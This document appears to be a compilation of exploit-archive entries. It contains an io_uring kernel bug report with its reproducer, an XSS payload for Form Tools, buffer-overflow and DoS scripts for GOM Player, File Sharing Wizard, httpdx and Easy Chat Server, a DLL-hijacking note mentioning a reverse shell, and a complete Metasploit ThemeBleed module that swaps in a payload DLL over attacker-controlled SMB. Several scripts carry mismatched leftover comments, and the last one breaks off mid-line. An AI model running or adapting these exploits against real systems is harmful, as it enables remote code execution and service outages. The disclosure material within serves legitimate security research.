<pre><code>io_uring: __io_uaddr_map() handles multi-page region dangerously<br /><br />__io_uaddr_map() wants to import a region from userspace, and then address the<br />imported region through the linear mapping area. This requires that the<br />imported region is physically contiguous.<br />A comment in __io_uaddr_map() explains that the imported region is usually<br />just a single page, in which case that is trivially fine.<br />However, __io_uaddr_map() also has code intended to permit multi-page regions,<br />in which case it tries to enforce that the entire region maps to the same<br />folio (in other words, the same head page):<br /><br /> /*<br /> * Should be a single page. If the ring is small enough that we can<br /> * use a normal page, that is fine. If we need multiple pages, then<br /> * userspace should use a huge page. That's the only way to guarantee<br /> * that we get contigious memory, outside of just being lucky or<br /> * (currently) having low memory fragmentation.<br /> */<br /> if (page_array[0] != page_array[ret - 1])<br /> goto err;<br /><br />This code is wrong for (more or less) two reasons:<br /><br />1. It only checks the first and last page; it doesn't check any of the pages<br /> in between. Userspace can easily create a set of adjacent VMAs such that<br /> the first and last virtual page map to the same physical page, while pages<br /> in between map to entirely unrelated pages.<br />2. 
It misunderstands how compound pages are represented in the kernel, and<br /> will always reject the case it is supposed to allow:<br /> `pin_user_pages_fast()` would return a set of adjacent `struct page`<br /> instances that are associated with the same head page / folio; it<br /> wouldn't return the same `struct page *` for every subpage.<br /> Every chunk of memory of size `PAGE_SIZE` maps to its own `struct page`.<br /><br />So if this code is presented with a userspace region of the following shape,<br />containing individual 4K pages:<br /><br />[page A]<br />[page B]<br />[...]<br />[page A]<br /><br />then it will accept the region and assume that `page_to_virt(<page A>)`<br />returns the address of a page as big as the entire region. Accesses to the<br />first 4KiB of the region would work as intended; but accesses to later parts<br />of the region will be out-of-bounds accesses to unrelated pages.<br /><br /><br />Here's a reproducer that submits a bunch of NOP ops (zeroed sqes) until it<br />overruns the end of the first sq page:<br /><br />```<br />#define _GNU_SOURCE<br />#include <unistd.h><br />#include <err.h><br />#include <stdio.h><br />#include <sys/mman.h><br />#include <sys/syscall.h><br />#include <linux/io_uring.h><br /><br />#define SYSCHK(x) ({ \<br /> typeof(x) __res = (x); \<br /> if (__res == (typeof(x))-1) \<br /> err(1, "SYSCHK(" #x ")"); \<br /> __res; \<br />})<br /><br />#define NUM_SQ_PAGES 4<br /><br />int main(void) {<br /> int memfd_sq = SYSCHK(memfd_create("", 0));<br /> int memfd_cq = SYSCHK(memfd_create("", 0));<br /> SYSCHK(ftruncate(memfd_sq, NUM_SQ_PAGES * 0x1000));<br /> SYSCHK(ftruncate(memfd_cq, NUM_SQ_PAGES * 0x1000));<br /><br /> // sq<br /> void *sq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_sq, 0));<br /> SYSCHK(mmap(sq_data+(NUM_SQ_PAGES-1)*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_sq, 0));<br /><br /> // cq (rings)<br /> void *cq_data 
= SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_cq, 0));<br /> *(volatile unsigned int *)(cq_data+4) = 64 * NUM_SQ_PAGES;<br /> for (int i=1; i<NUM_SQ_PAGES; i++)<br /> SYSCHK(mmap(cq_data+i*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_cq, 0));<br /><br /> struct io_uring_params params = {<br /> .flags = IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY /*| IORING_SETUP_CQE32*/,<br /> .sq_off = {<br /> .user_addr = (unsigned long)sq_data<br /> },<br /> .cq_off = {<br /> .user_addr = (unsigned long)cq_data<br /> }<br /> };<br /> int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/64 * NUM_SQ_PAGES, &params));<br /> printf("uring_fd = %d\n", uring_fd);<br /><br /> /* submit nops */<br /> int enter_res = SYSCHK(syscall(__NR_io_uring_enter, uring_fd, 64 * NUM_SQ_PAGES, 0, 0, NULL));<br /> printf("enter returned %d\n", enter_res);<br />}<br />```<br /><br />It gives an ASAN splat like this (but note that the splat diagnostic is wrong because ASAN can't detect page OOB access properly):<br /><br />```<br />[ 73.380288] ==================================================================<br />[ 73.381745] BUG: KASAN: slab-use-after-free in io_submit_sqes+0x223/0xc00<br />[ 73.382822] Read of size 1 at addr ffff88810263a000 by task uring-multipage/708<br />[ 73.383967] <br />[ 73.384240] CPU: 6 PID: 708 Comm: uring-multipage Not tainted 6.7.0-rc2 #357<br />[ 73.385316] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014<br />[ 73.386778] Call Trace:<br />[ 73.387177] <TASK><br />[ 73.387520] dump_stack_lvl+0x4a/0x80<br />[ 73.388117] print_report+0xcf/0x670<br />[...]<br />[ 73.389595] kasan_report+0xd8/0x110<br />[...]<br />[ 73.391954] io_submit_sqes+0x223/0xc00<br />[ 73.392570] __do_sys_io_uring_enter+0x965/0x1200<br />[...]<br />[ 73.397438] do_syscall_64+0x46/0xf0<br />[ 73.398004] entry_SYSCALL_64_after_hwframe+0x6e/0x76<br />[ 73.398787] RIP: 
0033:0x7ff8ed2e7989<br />[ 73.399494] Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d d7 64 0c 00 f7 d8 64 89 01 48<br />[ 73.402164] RSP: 002b:00007fff76dc3598 EFLAGS: 00000202 ORIG_RAX: 00000000000001aa<br />[ 73.403277] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff8ed2e7989<br />[ 73.404314] RDX: 0000000000000000 RSI: 0000000000000100 RDI: 0000000000000005<br />[ 73.411155] RBP: 00007fff76dc3690 R08: 0000000000000000 R09: 0000020000000100<br />[ 73.412496] R10: 0000000000000000 R11: 0000000000000202 R12: 000055967f6680a0<br />[ 73.417987] R13: 00007fff76dc3770 R14: 0000000000000000 R15: 0000000000000000<br />[ 73.419272] </TASK><br />[removed irrelevant alloc/free traces of the accessed memory region]<br />[ 73.449202] <br />[ 73.449471] The buggy address belongs to the object at ffff88810263a000<br />[ 73.449471] which belongs to the cache kmalloc-128 of size 128<br />[ 73.451228] The buggy address is located 0 bytes inside of<br />[ 73.451228] freed 128-byte region [ffff88810263a000, ffff88810263a080)<br />[ 73.453173] <br />[ 73.453429] The buggy address belongs to the physical page:<br />[ 73.454232] page:000000002be796b3 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10263a<br />[ 73.455535] head:000000002be796b3 order:1 entire_mapcount:0 nr_pages_mapped:0 pincount:0<br />[ 73.456662] flags: 0x200000000000840(slab|head|node=0|zone=2)<br />[ 73.457522] page_type: 0xffffffff()<br />[ 73.458045] raw: 0200000000000840 ffff8881000428c0 ffffea0004747e80 0000000000000002<br />[ 73.459143] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000<br />[ 73.460305] page dumped because: kasan: bad access detected<br />[ 73.461091] <br />[ 73.461353] Memory state around the buggy address:<br />[ 73.462038] ffff888102639f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />[ 73.463058] ffff888102639f80: 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />[ 73.464277] >ffff88810263a000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb<br />[ 73.465289] ^<br />[ 73.465791] ffff88810263a080: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc<br />[ 73.466795] ffff88810263a100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb<br />```<br /><br />I'm not sure about the best way to fix it - since the compound page support<br />can't actually have worked, as explained above, maybe it's easiest to just<br />drop support for compound pages? Or alternatively we could fix that, but since<br />nobody seems to have used it, that'd maybe be unnecessary complexity...<br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is 2024-02-22.<br /><br />Related CVE Numbers: CVE-2023-6560.<br /><br /><br /><br />Found by: jannh@google.com<br /><br /></code></pre>
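The two reasons the report gives (the check compares only the first and last entry, and it compares `struct page` pointers, which differ for every subpage of a compound page) can be shown side by side on a small user-space model. This is an added example, not code from the report or from the kernel: `struct page` is reduced to a head pointer and a subpage index, the three `page_array[]` layouts are constructed here, and `contiguous_folio_check()` is this example's own name for the kind of check the report says is needed (same folio, consecutive subpages); it is not the kernel's actual fix.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Stand-in for the kernel's struct page, constructed for this example: every
 * PAGE_SIZE chunk has its own struct page; subpages of a compound page (folio)
 * point at the same head page and carry their position inside it. */
struct page {
    struct page *head;   /* the folio's head page; a lone 4K page is its own head */
    unsigned int index;  /* position of this subpage inside the folio, 0 for the head */
};

/* The check quoted from __io_uaddr_map(): looks only at the first and last
 * entries, and compares struct page pointers, which differ for every subpage. */
static bool buggy_same_page_check(struct page **page_array, size_t nr_pages)
{
    return page_array[0] == page_array[nr_pages - 1];
}

/* What "one physically contiguous region" actually requires: every entry is a
 * subpage of the same folio as the first entry, and the subpage indices run
 * consecutively, so the region really is back-to-back behind page_to_virt(). */
static bool contiguous_folio_check(struct page **page_array, size_t nr_pages)
{
    struct page *folio = page_array[0]->head;
    unsigned int base = page_array[0]->index;

    for (size_t i = 0; i < nr_pages; i++) {
        if (page_array[i]->head != folio)
            return false;
        if (page_array[i]->index != base + i)
            return false;
    }
    return true;
}

/* Layout from the report, reason 1: four order-0 pages where adjacent VMAs
 * map the same page first and last, i.e. [page A][page B][page C][page A]. */
static bool aliased_region_passes(bool use_contiguous_check)
{
    struct page a = { .head = &a, .index = 0 };
    struct page b = { .head = &b, .index = 0 };
    struct page c = { .head = &c, .index = 0 };
    struct page *region[] = { &a, &b, &c, &a };
    size_t n = sizeof region / sizeof region[0];

    return use_contiguous_check ? contiguous_folio_check(region, n)
                                : buggy_same_page_check(region, n);
}

/* Layout from the report, reason 2: the case the original comment wants to
 * allow, four consecutive subpages of one huge page (one folio). */
static bool huge_page_region_passes(bool use_contiguous_check)
{
    struct page folio[4];
    struct page *region[4];

    for (unsigned int i = 0; i < 4; i++) {
        folio[i].head = &folio[0];
        folio[i].index = i;
        region[i] = &folio[i];
    }
    return use_contiguous_check ? contiguous_folio_check(region, 4)
                                : buggy_same_page_check(region, 4);
}

/* Same folio, but the VMAs present its subpages out of order: a same-folio
 * test alone would accept this; the index check is what rejects it. */
static bool shuffled_folio_region_passes(bool use_contiguous_check)
{
    struct page folio[4];
    struct page *region[4] = { &folio[2], &folio[0], &folio[1], &folio[3] };

    for (unsigned int i = 0; i < 4; i++) {
        folio[i].head = &folio[0];
        folio[i].index = i;
    }
    return use_contiguous_check ? contiguous_folio_check(region, 4)
                                : buggy_same_page_check(region, 4);
}

int main(void)
{
    printf("aliased [A][B][C][A]: buggy=%d contiguous=%d\n",
           aliased_region_passes(false), aliased_region_passes(true));
    printf("huge page subpages  : buggy=%d contiguous=%d\n",
           huge_page_region_passes(false), huge_page_region_passes(true));
    printf("shuffled subpages   : buggy=%d contiguous=%d\n",
           shuffled_folio_region_passes(false), shuffled_folio_region_passes(true));
    return 0;
}
```

The first layout is accepted by the quoted check and rejected by the contiguous one; the huge-page layout, the only one the comment meant to allow, is rejected by the quoted check because `&folio[0] != &folio[3]`, which is the report's second point.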
<pre><code># Exploit Title: Form Tools Version: 3.1.1 - Reflected XSS <br /># Date: 2024-6-1<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://formtools.org/<br /># Version: 3.1.1<br /># Tested on: https://www.softaculous.com/demos/Form_Tools<br /><br /><br />1) Write your payload after form_id: https://demos2.softaculous.com/Form_Toolsdswyuy0rdr/modules/form_builder/preview.php?form_id=2<br /> Payload: "><sVg/onLy=1 onLoaD=confirm(1)//<br />2) You will see an alert button: https://demos2.softaculous.com/Form_Toolsdswyuy0rdr/modules/form_builder/preview.php?form_id=2%22%3E%3CsVg/onLy=1%20onLoaD=confirm(1)//<br /></code></pre>
<pre><code># Exploit Title: Gom Player 2.3.92.5362 - Buffer Overflow (PoC)<br /># Discovered by: Yehia Elghaly (Mrvar0x)<br /># Discovered Date: 04.01.2024<br /># Vendor Homepage: https://www.gomlab.com/en<br /># Tested Version: 2.3.92.5362<br /># Tested on: Windows 7, Windows 10<br /><br /># - Open GOM Player<br /># - Click on the settings<br /># - From the menu, select Audio --> Equalizer<br /># - Click on the plus sign to go to the "Add EQ preset" screen<br /># - Copy the contents of exploit.txt and paste it into name box, then click OK<br /># - Crashed!<br /><br /><br /><br />#!/usr/bin/python<br /><br />exploit = 'A' * 417<br /><br />try:<br /> file = open("exploit.txt","w")<br /> file.write(exploit)<br /> file.close()<br /><br /> print("POC is created")<br />except:<br /> print("POC is not created")<br /></code></pre>
<pre><code># Exploit Title: Gom Player 2.3.92.5362 - nvcuda.dll DLL Hijacking<br /># Date: 2023-01-03<br /># Exploit Author: Yehia Elghaly (Mrvar0x)<br /># Vendor Homepage: https://www.mrvar0x.com/<br /># Version: 2.3.92.5362<br /># Tested on: Windows 7, Windows 10<br /><br />A DLL hijacking vulnerability has been discovered in Gom Player 2.3.92.5362. When a user loads the application, it will try to load the missing DLL nvcuda.dll from the same directory. Using a crafted DLL from MSFVENOM, it is possible to execute arbitrary code in the context of the currently logged-in user.<br /><br /><br />Gom Player 2.3.92.5362 can also load any malicious DLL with any given name from any directory without properly checking the loaded DLL. For example: open Gom Player -- Settings -- Filter/Codec -- Render Filter -- Advanced rendering method -- Add -- Browse -- then load lol.dll, which is generated by MSFVENOM, and it will execute a reverse shell.<br /></code></pre>
<pre><code>#include <stdio.h><br />#include <string.h><br />#include <unistd.h><br />#include <openssl/ssl.h><br />#include <openssl/err.h><br /><br />#define IP "127.0.0.1"<br />#define PORT 5061<br /><br />int main() {<br /> SSL_library_init();<br /> SSL_load_error_strings();<br /> OpenSSL_add_ssl_algorithms();<br /><br /> const SSL_METHOD *method = TLS_server_method();<br /> SSL_CTX *ctx = SSL_CTX_new(method);<br /><br /> if (!ctx) {<br /> fprintf(stderr, "Unable to create SSL context\n");<br /> ERR_print_errors_fp(stderr);<br /> return 1;<br /> }<br /><br /> SSL *ssl = SSL_new(ctx);<br /> if (!ssl) {<br /> fprintf(stderr, "Unable to create SSL\n");<br /> ERR_print_errors_fp(stderr);<br /> return 1;<br /> }<br /><br /> if (SSL_set_fd(ssl, fileno(stdin)) <= 0) {<br /> fprintf(stderr, "Unable to set SSL file descriptor\n");<br /> ERR_print_errors_fp(stderr);<br /> return 1;<br /> }<br /><br /> // SSL_set_connect_state() returns void, so there is no result to check<br /> SSL_set_connect_state(ssl);<br /><br /> // SSL_CIPHER_find() takes an SSL* and a two-byte cipher id, not a name, so the<br /> // cipher list is where the name is applied; check that the call succeeded<br /> if (SSL_set_cipher_list(ssl, "TLS_NULL_WITH_NULL_NULL") != 1) {<br /> fprintf(stderr, "Unable to set cipher list\n");<br /> ERR_print_errors_fp(stderr);<br /> return 1;<br /> }<br /><br /> if (SSL_connect(ssl) <= 0) {<br /> fprintf(stderr, "Unable to connect\n");<br /> ERR_print_errors_fp(stderr);<br /> return 1;<br /> }<br /><br /> printf("Connected with cipher %s\n", SSL_CIPHER_get_name(SSL_get_current_cipher(ssl)));<br /><br /> // Send malicious ClientHello messages continuously<br /> while (1) {<br /> if (SSL_connect(ssl) <= 0) {<br /> fprintf(stderr, "Unable to connect\n");<br /> ERR_print_errors_fp(stderr);<br /> return 1;<br /> }<br /> sleep(1);<br /> }<br /><br /> SSL_shutdown(ssl);<br /> SSL_free(ssl);<br /> SSL_CTX_free(ctx);<br /> EVP_cleanup();<br /><br /> return 0;<br />}<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket::INET;<br /><br /># Exploit Title: File Sharing Wizard 1.5.0 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 07 January 2024<br /># Vendor Homepage: N/A<br /># Download to demo: https://drive.google.com/file/d/13fs9IHSaGQ27YIQNDyrQV20jCT7owPQ6/view?usp=sharing<br /># Notification vendor: Not reported<br /># Tested Version: File Sharing Wizard 1.5.0<br /># Tested on: Windows XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Video: https://drive.google.com/file/d/1gPiMU0Wemdx-rxEzAPhQCyparn1JiX0j/view?usp=sharing<br /><br />#1. Description<br /><br />#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server did not properly handle requests with large amounts of data sent via the GET method to the web server.<br />#The following request sends a large amount of data to the web server to process via the GET method; the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> # $^O is "MSWin32" on Windows, not "windows"<br /> if ($sis eq "MSWin32"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br /> my $exploit = "\x41"x1360;<br /><br /> my $payload_header = "GET " . 
$exploit;<br /> $payload_header .= " HTTP/1.0\r\n\r\n";<br /><br /> my $connect = IO::Socket::INET->new(<br /> PeerAddr => $ip,<br /> PeerPort => $port,<br /> Proto => 'tcp'<br /> ) or die "Unable to connect to the victim: $!\n";<br /><br /> $connect->send($payload_header);<br /> close $connect;<br /><br /> print "[+] Done! Exploited!\n";<br /><br /><br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print "#################################################################\n";<br /> print "# File Sharing Wizard 1.5.0 - Denied of Service #\n";<br /> print "# #\n";<br /> print "# Coded by Fernando Mengali #\n";<br /> print "# #\n";<br /> print "# e-mail: fernando.mengalli\@gmail.com #\n";<br /> print "# #\n";<br /> print "#################################################################\n";<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket::INET;<br /><br /># Exploit Title: httpdx 1.5.4 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 06 January 2024<br /># Vendor Homepage: http://httpdx.sourceforge.net<br /># Download to demo: https://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/<br /># Download 2 to demo: https://drive.google.com/file/d/1Slsd7qCPom4uoSPXdiONS4xh-8tp4fkV/view?usp=sharing<br /># Notification vendor: Not reported<br /># Tested Version: httpdx 1.5.4 - Denial of Service (DoS)<br /># Tested on: Windows XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Video: https://drive.google.com/file/d/1hGn5AZbtVTzA_oiZPZ9yOVzIBVzKYGhQ/view?usp=sharing<br /><br />#1. Description<br /><br />#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The web server does not correctly handle the amount of data or bytes sent.<br />#When authenticating to the web server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> # $^O is "MSWin32" on Windows, not "windows"<br /> if ($sis eq "MSWin32"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br /> my $sock = IO::Socket::INET->new("$ip:$port") or die "Unable to connect to the victim: $!\n";<br /><br /> my $exploit = "\x41"x1040;<br /><br /> print $sock "POST /index2.html HTTP/1.0\r\n" . <br /> "Content-Length: 1023\r\n" . 
<br /> "Content-Type: html\r\n" . <br /> "Host: $ip" . "\r\n" .<br /> "\r\n" .<br /> $exploit;<br /> <br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print q {<br /><br /> ---------- # ------------------------------------------------------------------<br /> --------- ##= -------------- [+] httpdx 1.5.4 - Denied of Service (DoS) -------<br /> -------- ##=== ----------------------------------------------------------------<br /> ------ ###==#=== --------------------------------------------------------------<br /> ---- ####===##==== ------------------------------------------------------------<br /> -- #####====###===== ----- Coded by Fernando Mengali -----<br /> - #####=====####===== ----- fernando.mengalli@gmail.com -----<br /> - #####=====####===== ---------------------------------------------------------<br /> --- ####= # #==== -------- Prepare to exploiting the server ------------<br /> --------- ##= -----------------------------------------------------------------<br /> ------- ####=== ---------------------------------------------------------------<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::FILEFORMAT<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::Remote::SMB::Server::Share<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Themebleed- Windows 11 Themes Arbitrary Code Execution CVE-2023-38146',<br /> 'Description' => %q{<br /> When an unpatched Windows 11 host loads a theme file referencing an msstyles file, Windows loads the<br /> msstyles file, and if that file's PACKTHEM_VERSION is `999`, it then attempts to load an accompanying dll<br /> file ending in `_vrf.dll`. Before loading that file, it verifies that the file is signed. It does this by<br /> opening the file for reading and verifying the signature before opening the file for execution.<br /> Because this action is performed in two discrete operations, it opens the procedure for a time of check to<br /> time of use vulnerability. 
By embedding a UNC file path to an SMB server we control, the SMB server can<br /> serve a legitimate, signed dll when queried for the read, but then serve a different file of the same name<br /> when the host intends to load/execute the dll.<br /> },<br /> 'DisclosureDate' => '2023-09-13',<br /> 'Author' => [<br /> 'gabe_k', # Discovery/PoC<br /> 'bwatters-r7', # msf exploit<br /> 'Spencer McIntyre' # msf exploit<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-38146'],<br /> ['URL', 'https://exploits.forsale/themebleed/'],<br /> ['URL', 'https://github.com/gabe-k/themebleed/tree/main']<br /><br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_X64,<br /> 'Targets' => [<br /> [ 'Windows', {} ],<br /> ],<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],<br /> 'AKA' => ['ThemeBleed']<br /><br /> },<br /> 'DefaultOptions' => { 'DisablePayloadHandler' => false }<br /> )<br /> )<br /><br /> register_options([<br /> OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. 
aero.msstyles).', '' ], regex: /.*\w*\.msstyles$/),<br /> OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/),<br /> OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ])<br /> ])<br /><br /> deregister_options(<br /> 'FILENAME', # this is the one used by the FILEFORMAT mixin, replaced by THEME_FILE_NAME for clarity<br /> 'FILE_NAME', # this is the one used by the SMB::Server::Share mixin, replaced by STYLE_FILE_NAME for clarity<br /> 'FOLDER_NAME'<br /> )<br /> end<br /><br /> def file_format_filename<br /> datastore['THEME_FILE_NAME']<br /> end<br /><br /> def setup<br /> super<br /><br /> @file = File.binread(datastore['STYLE_FILE'])<br /> begin<br /> pe = Rex::PeParsey::Pe.new_from_string(@file)<br /> rescue Rex::PeParsey::PeError => e<br /> fail_with(Failure::BadConfig, "Failed to parse the STYLE_FILE: #{e}")<br /> end<br /><br /> unless pe.resources && (rva = pe.resources['/PACKTHEM_VERSION/0/0']&.rva)<br /> fail_with(Failure::BadConfig, 'The STYLE_FILE has no PACKTHEM_VERSION resource.')<br /> end<br /> @file_version_offset = pe.rva_to_file_offset(rva)<br /><br /> @file_name = datastore['STYLE_FILE_NAME'].blank? ? 
Rex::Text.rand_text_alpha(rand(4..6)) : datastore['STYLE_FILE_NAME']<br /> @file_name << '.msstyles' unless @file_name.end_with?('.msstyles')<br /> end<br /><br /> def primer<br /> payload_dll = generate_payload_dll<br /> max_length = [payload_dll.length, @file.length].max<br /> # make sure that the lengths are the same by padding the smaller to the length of the larger<br /> @file.ljust(max_length, "\x00".b)<br /> payload_dll.ljust(max_length, "\x00".b)<br /><br /> virtual_disk = service.shares[@share]<br /> @service = service<br /><br /> virtual_file = ThreadLocalVirtualStaticFile.new(virtual_disk, "/#{@file_name}_vrf.dll", @file)<br /> virtual_disk.add(virtual_file)<br /> # install this hook for create requests to set the thread-local file content<br /> virtual_disk.add_hook(RubySMB::SMB2::Packet::CreateRequest) do |_session, request|<br /> next unless request.name.read_now!.encode.ends_with?('_vrf.dll')<br /><br /> if request.desired_access.execute == 1<br /> virtual_file.tl_content = payload_dll<br /> else<br /> virtual_file.tl_content = @file<br /> end<br /><br /> nil<br /> end<br /><br /> file_create(make_theme)<br /> end<br /><br /> def get_file_contents(client:)<br /> print_status("Sending file to #{client.peerhost}")<br /> new_version = [999].pack('v')<br /> @file[0...@file_version_offset] + new_version + @file[(@file_version_offset + new_version.length)...]<br /> end<br /><br /> def make_theme<br /> <<~THEME<br /> [Theme]<br /> DisplayName=@%SystemRoot%\\System32\\themeui.dll,-2060<br /><br /> [Control Panel\\Desktop]<br /> Wallpaper=%SystemRoot%\\web\\wallpaper\\Windows\\img0.jpg<br /> TileWallpaper=0<br /> WallpaperStyle=10<br /><br /> [VisualStyles]<br /> Path=\\\\#{datastore['SRVHOST']}\\#{@share}\\#{@file_name}<br /> ColorStyle=NormalColor<br /> Size=NormalSize<br /><br /> [MasterThemeSelector]<br /> MTSM=RJSPBS<br /> THEME<br /> end<br /><br /> class ThreadLocalVirtualStaticFile < RubySMB::Server::Share::Provider::VirtualDisk::VirtualStaticFile<br 
/> def initialize(*args, **kwargs)<br /> super<br /> @default_content = @content<br /> @tl_content = {}<br /> @tl_content.compare_by_identity<br /> end<br /><br /> def open(mode = 'r', &block)<br /> @content = tl_content<br /> super<br /> end<br /><br /> def tl_content=(content)<br /> @tl_content[Thread.current] = content<br /> end<br /><br /> def tl_content<br /> @tl_content.fetch(Thread.current, @default_content)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br /><br />use Net::FTP;<br />use IO::Socket::INET; # the socket below is an IO::Socket::INET, so load it explicitly<br /><br /># Exploit Title: Easy Chat Server 3.1 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 05 January 2024<br /># Vendor Homepage: N/A<br /># Download to demo: https://drive.google.com/file/d/1ZbfeaWSEKlpvCG1eUtD0vNnfkNz_8PlE/view<br /># Notification vendor: Not reported<br /># Tested Version: Easy Chat Server 3.1<br /># Tested on: Windows XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Video: https://drive.google.com/file/d/1rG6uTXTg3cTg86qmp9rh2ozQfyOV_Av7/view<br /><br />#1. Description<br /><br />#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server did not properly handle requests with large amounts of data sent via the GET method to the web server.<br />#The following request sends a large amount of data to the web server to process via the GET method; the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> # $^O is "MSWin32" on Windows, not "windows"<br /> if ($sis eq "MSWin32"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br /> my $payload = "\x90" x 16;<br /> $payload = "\x41"x568;<br /><br />my $buffer = "GET /chat.ghp?username=" . $payload . 
